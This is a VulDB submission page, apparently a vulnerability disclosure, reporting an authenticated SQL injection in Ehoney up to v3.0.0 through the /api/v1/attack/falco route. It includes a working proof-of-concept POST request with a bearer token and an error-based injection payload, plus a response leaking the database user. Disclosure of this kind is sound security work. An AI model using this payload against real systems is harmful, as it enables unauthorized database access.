提交 #49824: Ehoney <= v3.0.0 Authenticated SQL injection via /api/v1/attack/falco route信息

标题Ehoney <= v3.0.0 Authenticated SQL injection via /api/v1/attack/falco route
描述repo: https://github.com/seccome/Ehoney ## requests POST /api/v1/attack/falco HTTP/1.1 Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImEiLCJwYXNzd29yZCI6IiQyYSQxNCRINmVmQ0xLbFhRRnl3QXF6V0NGalB1bGhPLlU3MTlYRnhLZ1ZRN01OMTlUamhqZWo5bWcwVyIsImV4cCI6MTY2Njc3MjU4NiwiaXNzIjoiZ2luLWJsb2cifQ.GVpPi4PxprCAIiAMI7R_fko2g_9C-F9kVTFb_EbKWqo Content-Length: 113 Content-Type: application/json Host: x.x.x.x:8080 { "Payload": "' and (extractvalue(1,concat(0x7e,(select user()),0x7e))) #", "PageNumber": 1, "PageSize": 1 } ## response { "code": 1006, "msg": "数据库异常", "data": "Error 1105: XPATH syntax error: '[email protected]~'; Error 1105: XPATH syntax error: '[email protected]~'" } ## affected code https://github.com/seccome/Ehoney/blob/aba3197bd2fe9f16e9cf4e20c1a7df4a1608c5a7/models/falco.go#L61
用户
 Anonymous User
提交2022-10-26 03時48分 (4 年前)
管理2022-10-28 07時27分 (2 days later)
状态已接受
VulDB条目212412 [seccome Ehoney /api/v1/attack/falco Payload SQL注入]
积分17

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!